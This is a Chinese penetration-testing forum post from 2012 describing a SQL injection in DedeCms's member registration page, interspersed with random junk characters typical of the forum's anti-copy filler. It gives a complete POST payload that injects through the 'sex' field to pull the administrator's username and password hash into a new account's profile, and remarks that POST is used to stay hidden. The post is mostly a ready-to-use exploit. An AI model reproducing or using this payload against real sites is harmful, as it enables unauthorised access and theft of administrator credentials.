中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
% ^$ B% Y2 S) T$ l) G$ ?; d
1 j& v% `' X( I# N" _3 W' T
需要magic_quotes_gpc=Off
$ k: y8 w- H" n
! r3 I! q: \' p' Z
应该是没有什么大危害的漏洞.
8 o( @4 v8 u* }0 V
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
' R2 X: O0 p9 b" V( r
+ U/ R% L3 F) p6 z6 P
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
- [$ C. O3 x* p8 u
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
2 o* h& o9 \( t n4 d- ], R, `9 e' e8 ~
9 \) b& v( y( M3 ]
http:///de/member/reg_new.php
0 k: C$ S! N d o8 W3 X: j
! \9 j3 v0 j9 }
POST
4 E$ a, O! q9 b
3 r" J* o8 N! D
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
, `, @" z; b3 e h$ |: X1 q
# G8 j: {$ B& x) A. p: e. u
成功注册后,头像处里面有好玩的信息.
+ [( _7 V4 g+ F% ~
2 F( u9 q5 V# |- L$ A( T% M- |, f; A+ k
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2